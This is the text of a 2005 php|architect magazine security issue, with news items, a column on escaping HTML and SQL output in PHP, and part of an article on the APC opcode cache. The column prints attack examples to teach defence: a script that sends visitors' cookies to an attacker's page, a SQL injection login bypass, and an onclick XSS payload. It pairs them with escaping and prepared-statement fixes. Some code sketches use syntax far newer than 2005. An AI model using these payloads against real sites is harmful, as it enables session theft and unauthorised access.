VOLUME 4 ISSUE 10
www.phparchitect.com
FOCUS ON
SECURITY
PROTECT YOUR WORK FROM
SQL INJECTION ATTACKS
Ilia Alshanetsky explains
with this excerpt from
php|architect’s Guide to PHP Security
ESCAPE OUTPUT
Handling External Data
Is your work vulnerable to
HTTP RESPONSE SPLITTING?
THE CREATOR OF PHP
RASMUS LERDORF
ON
OPTIMIZATION WITH
THE ALTERNATIVE
PHP CACHE
Features
12 Optimization with APC: An introduction to PHP’s own opcode cache
by RASMUS LERDORF
18 SQL Injection: Excerpted from php|architect’s Guide to PHP Security
by ILIA ALSHANETSKY
26 Flocking to Seagull: Increase your productivity by focusing on application-specific code
by WILLIAM ZELLER and WERNER M. KRAUSS
36 PHP and News: Applying PHP to Publishing News
by RUBÉN MARTÍNEZ ÁVILA
Columns
4 EDITORIAL
6 php|news
8 TIPS & TRICKS: Escape Output: Treat External Data with Care
by BEN RAMSEY
44 TEST PATTERN: Can They PHP? Will Your Candidate Perform?
by MARCUS BAKER
50 SECURITY CORNER: HTTP Response Splitting
by CHRIS SHIFLETT
54 PRODUCT REVIEW: SendStudio 2004: Mass Emailing for the Masses
by PETER MACINTYRE
58 EXIT (0); I Would Like to Thank the Academy...
by MARCO TABINI
THIS MONTH
Download this month’s code at:
Volume 4 - Issue 10
Publisher
Marco Tabini
Editor-in-Chief
Sean Coates
Editorial Team
Arbi Arzoumani
Peter MacIntyre
Eddie Peloke
Graphics & Layout
Aleksandar Ilievski
Managing Editor
Emanuela Corso
News Editor
Leslie Hill
Authors
Ilia Alshanetsky, Rubén Martínez Ávila,
Marcus Baker, Werner M. Krauß, Rasmus
Lerdorf, Peter B. MacIntyre, Ben
Ramsey, Chris Shiflett,
William Zeller
php|architect (ISSN 1709-7169) is published
twelve times a year by Marco Tabini & Associates,
Inc., P.O. Box 54526, 1771 Avenue Road, Toronto,
ON M5M 4N5, Canada.
Although all possible care has been placed in
assuring the accuracy of the contents of this
magazine, including all associated source code,
listings and figures, the publisher assumes
no responsibilities with regards of use of the
information contained herein or in all associated
material.
php|architect, php|a, the php|architect logo, Marco
Tabini & Associates, Inc. and the Mta Logo are
trademarks of Marco Tabini & Associates, Inc.
Contact Information:
General mailbox:
Editorial:
Subscriptions:
Sales & advertising:
Technical support:
Printed in Canada
Copyright © 2003-2005 Marco Tabini & Associates, Inc.
All Rights Reserved
Reading the Table of Contents, flipping through the pages, or simply
eyeballing the cover of this issue, you will probably notice a certain
theme: security.
As I’m sure you’ve read in Security Corner over the past issues,
the problems of poorly architected sites, security-ignorant code, and
general carelessness when it comes to externally-supplied data are rampant in our
community. Failure to abide by a few simple rules (never trust external data; filter
input; escape output; etc.) has left much of the World Wide Web in a state of
epidemic. The main culprits: remote code execution, SQL injection, and cross-site
scripting (“XSS”).
I can almost hear some of you thinking “It can’t be THAT bad! How many times
do you have to beat this dead horse?” and I wish you were correct. The reality of the
situation is that XSS vulnerabilities (if not the other, more severe problems) can be
found on all but a few elite sites (relatively speaking, from a pool of billions of web
pages, of course).
Still don’t think it’s that bad? Then you should have been at php|works in Toronto,
last month. Rasmus (more on him below) gave a keynote talk on PHP Security, and
spent a good chunk of his time explaining the wide dispersion of XSS vulnerabilities.
To illustrate his point (perfectly, I might add), he asked his audience to shout out
the names of their favorite Canadian shopping sites, from which he chose a random
site he’d never visited. Within 90 seconds, Rasmus had effectively demonstrated an
XSS problem on the site. In fact, even the heavy-hitters are not immune: a friend
showed me a simple XSS exploit for Google, as I was writing this editorial. Google!
This is the sort of stuff that keeps me awake at night, and one of the reasons
we’re happy to bring you an issue that’s packed full of security-related content. We
have the standard Security Corner, with an explanation of HTTP Response Splitting,
and how you can avoid problems in this area. We’re also proud to be publishing
a chapter from Ilia Alshanetsky’s recently released book, php|architect’s Guide to
PHP Security, which is packed with even more security content. Ben continues his
mini-series on security-related tips, focusing on escaping output, with which you
can avoid the dreaded XSS problems on your sites.
Security aside (for a moment), we’re extremely excited to feature an article on
APC, the Alternative PHP Cache, written by the creator of PHP himself, Rasmus
Lerdorf. APC has been around for a while, but Rasmus (and his Yahoo! colleagues)
have recently put a considerable amount of work into a largely reworked major
release of this extension. There’s finally a stable opcode cache for PHP 5, and from
a source we can obviously trust, so we know it’s done right. A special “thanks” goes
out to Rasmus for writing the piece.
FOCUS ON
SECURITY
EDITORIAL
news
Volume 4 Issue 10 • php|architect •6
PHP 5.0.5 RC1
php.net announces the release of PHP 5.0.5
RC1.
“This version is a maintenance release
that contains numerous bug fixes, including
security fixes to vulnerabilities found in the
XMLRPC package. All users of PHP 5.0 are
encouraged to upgrade to this version.”
Some of the changes in PHP 5.0.5
include:
• Upgraded PCRE library to version
5.0.
• Added man pages for “phpize” and
“php-config” scripts.
• Changed ming to support official
0.2a and 0.3 library versions.
• Added PHP_INT_MAX and PHP_INT_SIZE
as predefined constants.
• Fixed memory corruption in stristr().
• Many more changes included as well
as several bug fixes.
Get your hands on the latest release at php.net!
MySQL 5.0
Release Candidate
MySQL announces:
“I’m proud and excited to announce the
first Release Candidate of MySQL 5.0. This
milestone signals that we are nearing what
is certainly the most important release in
MySQL’s history.
MySQL 5.0 has new functionality that I
hope will be welcomed, adopted, and put to
productive use by the community of MySQL
users—you. On the commercial side, MySQL
AB is getting a lot of good vibes from new
enterprise customers who are beginning to
understand the impact MySQL can have on
their IT infrastructure and costs of running
mission-critical applications.”
Some of the new ANSI SQL features
include:
• Views (both read-only and updatable
views)
• Stored Procedures and Stored
Functions, using the SQL:2003
syntax, which is also used by IBM’s
DB2
• Triggers (row-level)
• Server-side cursors (read-only, non-
scrolling)
Get all of the latest info from mysql.com.
NAJAX 0.4:
PHP Ajax Framework
The NAJAX Sourceforge homepage announces
the latest release version 0.4.1.0.
Najax is a PHP-based AJAX framework that
allows you to map server side functions into
JavaScript. The NAJAX project page describes
changes in this minor feature enhancement
release as:
• Small bug-fixes in the chatAdvanced
example—the error dialog was
removed.
• najax.html.importForm (imports an
associative array to the corresponding
form elements) and najax.html.exportForm
(exports form values to an associative
array) were added.
• Support for asynchronous call
canceling was added.
Check out the latest release at
PHPsh 1.0.1
According to the psychogenic homepage,
PHPsh provides “Simple, web-based shell
access to your server.”
“It can be very annoying when you are
restricted to FTP access—how can you find
out the full path to a directory, or perform
a command line SQL dump when you’re
trapped in the limited, chrooted environment
provided by an FTP server? PHPsh (PHP shell)
allows you to have shell commands run on
your behalf by any webserver which serves
PHP pages. It solves these issues and more,
allowing you to tap into the power of any
Unix (Linux, BSD, etc.) server!
PHPsh was designed to allow developers,
webmasters and sysadmins a quick and easy
remedy to those situations in which it would
be so easy to solve a problem or answer a
question with shell access but a pointy-haired
hosting company thinks shell access is only
useful for crackers... while simultaneously
allowing anyone with FTP access the right to
run arbitrary commands through CGI or PHP
(doh!).”
Download PHPsh from
chogenic.com/en/products/PHPsh.php.
php|architect Releases New Design Patterns Book
We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the
latest release in our Nanobook series.
You have probably heard a lot about Design Patterns —a technique that helps you
design rock-solid solutions to practical problems that programmers everywhere encounter
in their day-to-day work. Even though there has been a lot of buzz, however, no-one has
yet come up with a comprehensive resource on design patterns for PHP developers—until
today.
Author Jason E. Sweat’s book php|architect’s Guide to PHP Design Patterns is the first,
comprehensive guide to design patterns designed specifically for the PHP developer. This
book includes coverage of 16 design patterns with a specific eye to their applications in PHP
when building complex web applications, both in PHP 4 and PHP 5 (where appropriate,
sample code for both versions of the language is provided).
For more information,
Looking for a new PHP Extension?
Check out some of the latest
offerings from PECL.
expect 0.1
This extension allows you to interact with
processes through PTYs, using the expect
library.
runkit 0.6
Replace, rename, and remove user defined
functions and classes. Define customized
superglobal variables for general purpose
use. Execute code in restricted environment
(sandboxing).
pecl_http 0.14.1
• Building absolute URIs
• RFC compliant HTTP redirects
• RFC compliant HTTP date handling
• Parsing of HTTP headers and
messages
• Caching by “Last-Modified” and/
or ETag (with ‘on the fly’ option
for ETag generation from buffered
output)
• Support for sending data/files/
streams with (multiple) ranges
• Negotiating user preferred language/
charset
• Convenient request functionality
built upon libcurl
• PHP5 classes: HttpUtil, HttpResponse
(PHP-5.1), HttpRequest,
HttpRequestPool, HttpMessage
Xdebug 2.0.0beta4
The Xdebug extension helps you debug
your scripts by providing valuable debug
information, including the following:
• stack and function traces in error
messages with:
• full parameter display for user
defined functions
• function name, file name and line
indications
• support for member functions
• memory allocation
• protection for infinite recursions
Xdebug also provides:
• profiling information for PHP scripts
• script execution analysis
• capabilities to debug your scripts
interactively with a debug client
Check out some of the hottest new
releases from PEAR.
Validate_BE 0.1.1
Package contains locale validation for Belgium,
such as:
• Postal Code
• Bank Account Number
• Structured Bank Transfer message
(National transfer from one bank
account to another)
• VAT
• National ID
• Identity Card Number (not ready)
• SIS CARD ID (Belgian “sécurité
sociale” ID)
HTML_Progress2 2.0.0
This package provides a way to add a fully
customizable loading bar into existing XHTML
documents. Your browser should be DHTML-compatible.
Features:
• create bar (horizontal, vertical),
circle, ellipse and polygon (square,
rectangle) progress meters
• allows usage of existing external
StyleSheet and/or JavaScript
• all elements’ (progress, cells, labels)
HTML properties are customizable
• percentage/labels can be placed
around the progress meter
• compliant with CSS/XHTML
standards
• integration with template engines is
very easy
• implements the Observer design
pattern: it is possible to add Listeners
• adds a customizable monitor pattern
to display a progress bar; end-user
can abort progress at any time
• allows many progress meters on
the same page without the use of
iframes
• error handling system that supports
native PEAR_Error, but also PEAR_ErrorStack,
and any other system you
might want to plug in.
• PHP 5 ready
Image_Graph 0.7.0
Image_Graph provides a set of classes
that create graphs/plots/charts based on
(numerical) data. Many different plot types
are supported: Bar, line, area, step, impulse,
scatter, radar, pie, map, candlestick, band,
box & whisker and smoothed line, area and
radar plots. Graphs are highly customizable,
making it possible to get the exact look and
feel that is required.
The output is controlled by an Image_Canvas,
which facilitates easy delivery to many
different output formats: GD (PNG, JPEG, GIF,
WBMP), PDF (using PDFLib), Scalable Vector
Graphics (SVG), and others.
Image_Graph is compatible with both
PHP 4 and PHP 5.
Image_Canvas 0.2.2
A package providing a common interface
to image drawing, making image rendering
library-independent.
Services_Yahoo 0.1.1
Services_Yahoo provides object-oriented
interfaces to the web service capabilities of
Yahoo!
HTML_AJAX 0.2.1
Provides PHP and JavaScript libraries for
performing AJAX (Communication from
JavaScript to your server without reloading
the page).
Tips & Tricks
ESCAPE OUTPUT
TIPS & TRICKS
by BEN RAMSEY
In the previous three Tips & Tricks columns, I’ve
taken time to fully explain why all input should
be filtered, and I’ve offered tips on how to filter
your data so that the data you work with and
save isn’t considered tainted. However, security-
conscious programming doesn’t end with filtering data.
Sure, now the data conforms to expectations, but it
may still contain characters that have special meaning
depending on the medium in which your application
chooses to display it. That medium may be HTML, SQL,
XML, WML, etc.
Thus, we must escape output.
What is output? Output is any data that leaves your
application bound for another client or application. The
receiving client or application expects the data to be
of a specific format (HTML, SQL, etc.), and that format
may include characters or other information with special
meaning to the receiving client/application. The data
being sent, however, might—and probably does—
contain special characters that should not be interpreted
with any special meaning by the receiving client.
CODE DIRECTORY: escape
Data may leave your application in the form of HTML
sent to a Web browser, SQL sent to a database, XML sent
to an RSS reader, WML sent to a wireless device, etc. The
possibilities are limitless. Each of these has its own set
of special characters that are interpreted differently than
the rest of the plain text received. Sometimes we want to
send these special characters so that they are interpreted
(HTML tags sent to a Web browser, for example), while
other times (in the case of input from users or some other
source), we don’t want the characters to be interpreted,
so we need to escape them.
Escaping is also sometimes referred to as encoding.
In short, it is the process of representing data in a way
that it will not be executed or interpreted. For example,
HTML will render the following text in a Web browser as
bold-faced text because the <strong> tags have special meaning:
<strong>This is bold text.</strong>
But, suppose I want to render the tags in the browser
and avoid their interpretation. Then, I need to escape
the angle brackets, which have special meaning in HTML.
The following illustrates the escaped HTML:
&lt;strong&gt;This is bold text.&lt;/strong&gt;
Filter Input. Escape Output. You’re hearing an awful lot of this from
me lately, and as one person noted, “It’s great that they’re rubbing
this topic in.” Indeed. This month’s Tips & Tricks wraps up the recent
focus on security with a discussion on escaping output, why it’s
important, and how to do it.
Why Escape?
So, you run a Web-based forum, and you don’t have a problem with users
entering the occasional HTML tag. Why should you escape your output?
Here’s why: Suppose this forum allows users to enter HTML tags. That’s fair
enough, since you may want to allow them to enter bold-faced or italicized
text, but then it outputs everything in its raw form. Everything. So, all
HTML tags get interpreted by the web browser.
What if a user enters the following?
<script>
location.href = '…/cookies.php?cookies=' + document.cookie;
</script>
Any subsequent user who is logged into the
forum and visits this page will now be redirected to
the attacker’s page, and
any cookies set by the forum can be stolen.
Let’s look at another example. Many sites contain
login forms, which usually consist of two fields—a
username and a password. When a user enters a username
and password, the application may enter the values into
an SQL statement, as in the following:
$sql = "SELECT * FROM users
    WHERE username = '{$_POST['username']}'
    AND password = '{$_POST['password']}'";
This statement will work just fine as long as a user
enters a proper username and password, but suppose a
user enters something like “example' OR 1 = 1; --” as the username?
The value of 1 will always equal 1, and since the user properly closed
the single quote in the statement, the OR clause will be treated as part
of the SQL, and everything after the -- will be ignored (at least
in most database engines) as a comment. Thus, the user
is able to log in without an account.
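To see the effect, it can help to print the statement the database would actually receive. The following is a minimal sketch rather than code from this column: the helper name build_login_sql() is hypothetical, and no database is involved. It only shows how the unescaped value reshapes the query text.

```php
<?php
// Hypothetical helper for illustration only: builds the login query
// exactly as the vulnerable example does, with no filtering or escaping.
function build_login_sql(array $post): string
{
    return "SELECT * FROM users
        WHERE username = '{$post['username']}'
        AND password = '{$post['password']}'";
}

// Simulated form submission carrying the hostile username.
$sql = build_login_sql([
    'username' => "example' OR 1 = 1; --",
    'password' => 'anything',
]);

echo $sql, "\n";
```

In the printed statement, the quote typed by the user closes the string literal early, so OR 1 = 1 sits outside the quotes as part of the WHERE clause.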
The first step to ensure situations such as these
do not occur is to filter all input to ensure that no
unexpected characters appear in the data. See the July
2005 through September 2005 issues of php|architect for
my full discussion on input filtering.
After filtering, be sure to save the raw data. Do not escape it before
storing. If escaped before storing, then it might be necessary to unescape
it at some point in the future. For example, what if the data is escaped
for HTML output and stored to a database table only to be retrieved later
to output in XML or to PDF, etc.? Then, it must be unescaped to transport
to those formats, and possibly escaped again to accommodate the new output
medium. This process is bound to introduce more bugs to
your code and could likely reduce the quality of the data.
Thus, to make the most of your data, it is best to save it
raw (after filtering) and escape only when outputting.
Escaping output is not a terribly difficult process.
At the least, it may require the addition of a few extra
lines of code, or it may require a little more attention
to detail. The important thing to keep in mind is the
format outputted and the special characters that need
to be escaped for that format. For the purposes of this
discussion, I will cover escaping for HTML and SQL, since
PHP has excellent built-in functions for handling output
to these formats.
Escaping HTML
There are three main functions in PHP for escaping
HTML: htmlentities(), htmlspecialchars(), and strip_tags().
In the case of strip_tags(), no special characters are
actually escaped, but, instead, all HTML tags are removed.
Using this function with no extra parameters is probably
one of the safest ways to completely remove all HTML tags
from output. I have seen other user-defined functions
that attempt to do something similar by removing all
but a set of allowed tags, but these are not without their
flaws and can potentially introduce some nasty bugs
that are too lenient when outputting data. Likewise,
strip_tags() offers the option to allow certain tags
with the format strip_tags($str, '<p> <a> <b>');,
but this is also too lenient: attributes are not stripped
from allowed tags, allowing onclick events, etc. to
persist in output. Take the following code snippet, for
example:
$str = '<p><b>Bold text</b>
<a href="#" onclick="alert(\'XSS\');">Link</a>
<img src="example.png"/></p>';
echo strip_tags($str, '<p> <a> <b>');
This code will output the following, complete with
the cross-site scripting (XSS) in the onclick attribute:
<p><b>Bold text</b>
<a href="#" onclick="alert('XSS');">Link</a></p>
Rather than completely stripping the tags from
output, a better alternative may be to escape all the tags,
allowing them to render in the output. This is an easy
task with htmlspecialchars() and htmlentities().
Both of these functions serve the same purpose: to
convert special characters into their equivalent HTML
entities. The main difference is that htmlentities() is
more exhaustive, choosing to convert all characters with
HTML character entity equivalents to their respective
HTML entities. Thus, for its exhaustive nature, I will
recommend htmlentities() as the better function to use
to escape HTML output. For the above $str example,
htmlentities() returns the following:
&lt;p&gt;&lt;b&gt;Bold text&lt;/b&gt;
&lt;a href=&quot;#&quot; onclick=&quot;alert('XSS');&quot;&gt;Link&lt;/a&gt;
&lt;img src=&quot;example.png&quot;/&gt;&lt;/p&gt;
In this case, however, allowing the <b> tags may be
preferable, and so we can allow them by first escaping the
output and then converting the selected HTML entities
back to HTML with str_replace():
$str = htmlentities($str);
$str = str_replace('&lt;b&gt;', '<b>', $str);
$str = str_replace('&lt;/b&gt;', '</b>', $str);
This will ensure that we send only those special
characters that we desire to have interpreted to the client.
While this is a form of unescaping, which I mentioned
earlier is not a desirable process, it is nevertheless a
good alternative to using strip_tags() to allow
certain tags, as it will ensure that any tags that contain
undesirable attributes are not interpreted by the client.
In addition, there is no guesswork involved here; I am
not using a regular expression that I could potentially
get wrong and, thus, introduce a hole in my application.
I will always know what a <b> tag looks like after the
angle brackets have been converted to their HTML entity
equivalents, so it is easy for me to find and convert the
tags back to HTML.
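The escape-then-restore idea can be wrapped in a small function. This is a sketch under stated assumptions, not code from the column: the name escape_allowing() and its default whitelist are hypothetical, and the flags and charset passed to htmlentities() are spelled out so the result does not depend on a particular PHP version's defaults.

```php
<?php
// Hypothetical helper (not from the original column): escape everything,
// then restore only bare, attribute-free tags from a fixed whitelist.
function escape_allowing(string $str, array $tags = ['b']): string
{
    // Explicit flags and charset, so both quote styles are escaped
    // regardless of the PHP version's defaults.
    $escaped = htmlentities($str, ENT_QUOTES, 'UTF-8');

    foreach ($tags as $tag) {
        // Only the exact escaped forms are converted back, so a tag that
        // carries attributes (such as onclick) stays escaped.
        $escaped = str_replace(
            ["&lt;{$tag}&gt;", "&lt;/{$tag}&gt;"],
            ["<{$tag}>", "</{$tag}>"],
            $escaped
        );
    }

    return $escaped;
}

echo escape_allowing('<b>Bold</b> <a href="#" onclick="alert(1)">Link</a>'), "\n";
```

Because the restore step matches fixed strings only, the link in the sample input remains escaped while the plain bold tags come back as HTML.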
Escaping SQL
Similarly, PHP offers excellent built-in functions for
escaping SQL statements according to the database engine
used. For PostgreSQL, there is pg_escape_string(); for
MySQL, mysql_real_escape_string(); and for SQLite,
sqlite_escape_string(). If the other native database
functions provided in PHP do not offer a similar function,
then PHP offers addslashes(), though I would advise
that the database’s native escape string function is
always a better alternative than addslashes().
Using the SQL example from earlier, we can escape it
using mysql_real_escape_string(), as shown in Listing
1, where we first filter it using the filter() function I
gave in the August 2005 issue. Thus, if a user enters the
value “example' OR 1 = 1; --” as a username, the SQL
that is executed will be:
SELECT * FROM users
WHERE username = 'example\' OR 1 = 1; --'
AND password = 'password'
The single quotation mark is escaped and no results
are returned because this user doesn’t exist; the user
can’t gain access to the application.
Some database functions, such as the unified ODBC
functions, mysqli, and PDO (in PHP 5.1), use the concept
of prepared statements to prepare and properly escape
an SQL statement. Listing 2 illustrates a prepared-statement
example using PDO. The SQL statement that
is created will appear much like the one listed above,
but PDO offers added functionality through the optional
bindParam() parameters to define the type and length
of data.
Prepared statements also exist in PEAR::DB and
other database abstraction classes, but PDO offers much
promise since it is built into the language and, thus,
is much faster with less overhead.
So, if possible, use prepared statements (with PDO,
if possible). If they aren’t available, use the database’s
built-in escaping function. If that isn’t available, then
fall back on addslashes() as a last resort.
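The following self-contained sketch shows the earlier injection attempt against a prepared statement. It rests on several assumptions that are not part of this column: the pdo_sqlite driver is available, an in-memory SQLite database stands in for MySQL, and the table, the sample row, and the find_user() helper are all hypothetical. The plain-text password column only mirrors the column's example query.

```php
<?php
// Assumption: the pdo_sqlite driver is available. An in-memory SQLite
// database stands in for the MySQL server used in Listing 2.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Hypothetical table and row, for demonstration only.
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'secret')");

// Hypothetical helper: returns the rows matching the given credentials.
function find_user(PDO $db, string $username, string $password): array
{
    $stmt = $db->prepare('SELECT username FROM users
        WHERE username = :username AND password = :password');
    // Bound values are passed separately from the SQL text, so quotes
    // inside them cannot change the structure of the statement.
    $stmt->bindValue(':username', $username, PDO::PARAM_STR);
    $stmt->bindValue(':password', $password, PDO::PARAM_STR);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A genuine login, followed by the injection attempt from earlier.
var_dump(count(find_user($db, 'alice', 'secret')));
var_dump(count(find_user($db, "example' OR 1 = 1; --", 'x')));
```

The first call should find the sample row, while the second should find nothing, because the hostile string is compared as a literal username.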
For future installments of Tips & Tricks, I would like to
know what tips and tricks you are using. Please send
your tip and/or trick to
, and,
if I use it, you’ll receive a free digital subscription to
php|architect.
A Security-Conscious Mindset
The key to secure programming is having a security-
conscious mindset. Filtering input and escaping output
is just part of that mindset, but it takes more thought
than simply copying code from elsewhere to introduce
security to an application. It takes careful planning and
diligent testing.
By now, I hope that you are well on your way to being
a security-conscious programmer. I have introduced some
tools and concepts to help you get started, and it is likely
that you have thought of code you’ve already written and
how to improve it using these principles.
So, have fun, good luck, and be sure to keep security
at the forefront of a project. Security is not a design
feature—it is an essential tool.
<?php

// filter() is the whitelist helper from the August 2005 column.
$clean = filter($_POST, $post_whitelist);

// Escape each value for MySQL just before it goes into the statement.
$username = mysql_real_escape_string($clean['username']);
$password = mysql_real_escape_string($clean['password']);

$sql = "SELECT * FROM users
    WHERE username = '{$username}'
    AND password = '{$password}'";

?>
LISTING 1
<?php

$clean = filter($_POST, $post_whitelist);

$db = new PDO('mysql:host=localhost;dbname=example',
    'dbuser', 'dbpass');

// Named placeholders keep the values out of the SQL text.
$sql = 'SELECT * FROM users
    WHERE username = :username
    AND password = :password';

$stmt = $db->prepare($sql);
// PDO::PARAM_STR is the PHP 5.1 spelling of the older PDO_PARAM_STR constant.
$stmt->bindParam(':username', $clean['username'],
    PDO::PARAM_STR, 25);
$stmt->bindParam(':password', $clean['password'],
    PDO::PARAM_STR, 16);
$stmt->execute();

?>
LISTING 2
BEN RAMSEY is a Technology Manager for Hands On Network
in Atlanta, Georgia. He is an author, Principal member of the PHP
Security Consortium, and Zend Certified Engineer. Ben lives just north
of Atlanta with his wife Liz and dog Ashley. You may contact him at
or read his blog at
An opcode cache works by intercepting the
compile and execute hooks in the Zend engine
and then storing the result of the compilation
phase in a shared memory cache.
On subsequent requests to the same file,
a check is done to see if the opcodes corresponding
to the script are in the cache. There is also a check to
determine if the file on disk has a modification time
that is newer than the timestamp on the opcodes in the
cache.
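The lookup-and-freshness check described above can be sketched in plain PHP. This is a conceptual illustration only: a real opcode cache hooks into the Zend engine and keeps compiled opcodes in shared memory, whereas here a hypothetical ToyCodeCache class uses an array, and "compiling" is simulated by reading the file.

```php
<?php
// Conceptual sketch only: an array stands in for the shared memory cache
// and reading the file stands in for the compilation phase.
final class ToyCodeCache
{
    private array $entries = [];
    public int $compiles = 0;

    public function fetch(string $file): string
    {
        clearstatcache(true, $file);   // avoid PHP's cached stat data
        $mtime = filemtime($file);

        // Cache hit: an entry exists and the file is not newer than it.
        if (isset($this->entries[$file])
            && $mtime <= $this->entries[$file]['mtime']) {
            return $this->entries[$file]['code'];
        }

        // Cache miss or stale entry: "compile" again and store the result.
        $this->compiles++;
        $this->entries[$file] = [
            'mtime' => $mtime,
            'code'  => file_get_contents($file),
        ];

        return $this->entries[$file]['code'];
    }
}

$file = tempnam(sys_get_temp_dir(), 'toy');
file_put_contents($file, '<?php echo 1;');

$cache = new ToyCodeCache();
$cache->fetch($file);          // first request: compiled
$cache->fetch($file);          // second request: served from the cache
touch($file, time() + 60);     // pretend the file was edited later
$cache->fetch($file);          // newer modification time: compiled again

echo $cache->compiles, "\n";
unlink($file);
```

Of the three requests, only the first and the one following the simulated edit reach the "compile" step; the unchanged file is served from the array.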
There are a number of opcode caches available for
PHP. They are sometimes referred to as compilers or
accelerators, but I find “opcode cache” to be
the most accurate and descriptive term for what they do.
Packages similar to APC include ionCube
PHP Accelerator, eAccelerator, and Zend Cache. I will leave the choice
of cache up to you, but at the time of this
writing, only APC and Zend Cache had full PHP 5.1 support,
and of those two, only APC is open source and available
in PECL.
Installing APC
There are a number of things you can configure when
you build APC, but you still may be able to install it with
a simple “pear install apc” command (an example
install session can be seen in Listing 1).
I tend to prefer poking around in any PECL extensions
I want to use before I install them, so I install extensions
by checking them out from CVS, and compiling using the
normal phpize + ./configure + make + make install
method (Listing 2).
OPTIMIZATION WITH THE ALTERNATIVE PHP CACHE
FEATURE
PHP: 4.3+
OTHER SOFTWARE: APC
CODE DIRECTORY: apc
Adding an opcode cache to your PHP configuration is the
easiest way to speed up your PHP applications without
changing a single line of your code.
ABOUT THE AUTHOR: RASMUS LERDORF is known
for having gotten the PHP project off the ground in 1995 and for the
mod_info Apache module, and he can be blamed for the ANSI92 SQL-defying
LIMIT clause in mSQL 1.x, which has now, at least conceptually,
crept into both MySQL and PostgreSQL. Prior to joining Yahoo!
as an infrastructure engineer in 2002, he was at a string of
companies including Linuxcare, IBM, and Bell Canada working
on Internet technologies.
Common Configuration Options
The APC configuration directives that I normally place in
my php.ini file can be seen in Listing 3.
This setup gives me a 64M single file-backed memory-
mapped segment, geared for a server with 500 cacheable
files. I’ve turned opcode optimization off, because the
APC optimizer is quite unhappy at the moment, and set a
relatively low opcode cache time-to-live (ttl) of 30
minutes with a higher user cache ttl of 2 hours.
These TTL values are only used in case we start to hit
the top of our 64 megabyte segment. If we run out of
memory space, APC scans the cache for opcode and user
cache entries that haven’t been accessed for the number
of seconds denoted in the ttl configuration directive, and
removes them. The 500 files hint is just that: a hint.
You can easily cache more files than the number you’ve
declared, but it is there to help optimize the hashing
algorithm. There is no point in having a hashtable that
contains 10,000 slots, each using a little bit of memory,
if you are never going to have more than 25 files in it. An
apc.num_files_hint of 500 actually ends up creating a
hash table with 1000 slots. If two files hash to the same
slot, the second file gets linked to the first. The more entries
hash to the same slot, the longer this linked list of
entries becomes, and to fetch these entries, APC has to
walk these linked lists sequentially. Therefore, having
too few hash slots is also a bad thing. The one slight
advantage of having many collisions is that APC does
some very lazy garbage collection as it walks the linked
lists, but this behavior doesn’t outweigh the drawbacks.
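The trade-off between slot count and chain length can be seen with a toy chained hash table. This is only an illustration: APC's real table is implemented in C with its own hash function, so crc32(), the chain_lengths() helper, and the file paths below are all stand-ins chosen for this sketch.

```php
<?php
// Toy chained hash table, for illustration only; crc32() is a stand-in
// for whatever hash function the real cache uses.
function chain_lengths(array $files, int $slots): array
{
    $table = array_fill(0, $slots, []);
    foreach ($files as $file) {
        // Files that map to the same slot are appended to that slot's chain.
        // The mask keeps the hash non-negative on 32-bit builds.
        $table[(crc32($file) & 0x7fffffff) % $slots][] = $file;
    }

    return array_map('count', $table);
}

// 500 hypothetical script paths.
$files = [];
for ($i = 0; $i < 500; $i++) {
    $files[] = "/var/www/app/script{$i}.php";
}

foreach ([50, 1000] as $slots) {
    $lengths = chain_lengths($files, $slots);
    printf("%4d slots: longest chain %d, empty slots %d\n",
        $slots, max($lengths), count(array_keys($lengths, 0)));
}
```

With 50 slots, some chain must hold at least ten entries, which means longer sequential walks; with 1000 slots the chains are short, at the cost of many slots that hold nothing.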
The apc.mmap_file_mask configuration parameter
is tricky. Generally, you would just use the mkstemp-style
mask as I have shown in Listing 3. It is file-backed,
but the file is unlinked right after the mmap call, which
ensures that the shared memory segment is automatically
cleaned up (removed) when the APC (or APC-hosting)
process exits. If, for some reason, you want to force a
real anonymous mmap, you can leave it empty. You can
specify /dev/zero to mmap from there, if your OS prefers
that, or if you use something like /apc.shm.XXXXXX it
will use shm_open() instead. On Linux, that path has
to be in the root directory, and you must have shmfs
enabled (either compiled into the kernel, or loaded as
a module).
You can also prevent APC from caching certain files by using
the apc.filters configuration directive. You provide either
a single regular expression, or a comma-separated list of
regexes that match the full-path filenames you want to
exclude from being cached. The main reason you might want to
do this is in a scenario where you have files that change
extremely rapidly (by this, I mean every second or two).
Another circumstance where excluding certain files from the
cache might be beneficial is when your system consists of
literally hundreds of thousands of files, and you want to
force APC to focus on the performance-critical ones and not
have the little-used files potentially causing your cache to
fill up, which slows down garbage
10:36pm ubuntu:~> pear install apc
downloading APC-3.0.6.tgz ...
Starting to download APC-3.0.6.tgz (73,416 bytes)
.................done: 73,416 bytes
35 source files, building
running: phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20050617
Zend Extension Api No: 220050617
Use mmap instead of shmget (usually a good idea) [yes] :
Use apxs to set compile flags (if using APC with Apache)? [yes] :
building in /var/tmp/pear-build-root/APC-3.0.6
running: /tmp/tmppBlEkK/APC-3.0.6/configure --enable-apc-mmap=yes --with-apxs
...
Build process completed successfully
Installing ‘/var/tmp/pear-build-root/install-APC3.0.6//usr/local/php5/lib/php/extensions/no-debug-non-zts-20050617/apc.so’
install ok: APC 3.0.6
LISTING 1
$ cvs -d:pserver::/repository login
Logging in to :pserver::2401/repository
CVS password: phpfi
$ cvs -d:pserver::/repository co \
    pecl/apc
cvs checkout: Updating pecl/apc
U pecl/apc/.cvsignore
U pecl/apc/CHANGELOG
…
10:44pm ubuntu:/tmp> cd pecl/apc
10:44pm ubuntu:/tmp/pecl/apc> phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20050617
Zend Extension Api No: 220050617
$ ./configure --enable-apc-mmap \
    --with-php-config=/usr/local/php5/bin/php-config \
    --with-apxs
…
configure: creating ./config.status
config.status: creating config.h
10:45pm ubuntu:/tmp/pecl/apc> make
10:47pm ubuntu:/tmp/pecl/apc> make install
Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20050617/
LISTING 2
extension=apc.so
apc.enabled=1
apc.shm_segments=1
apc.optimization=0
apc.shm_size=64
apc.ttl=1800
apc.user_ttl=7200
apc.num_files_hint=500
apc.mmap_file_mask=/tmp/apc.XXXXXX
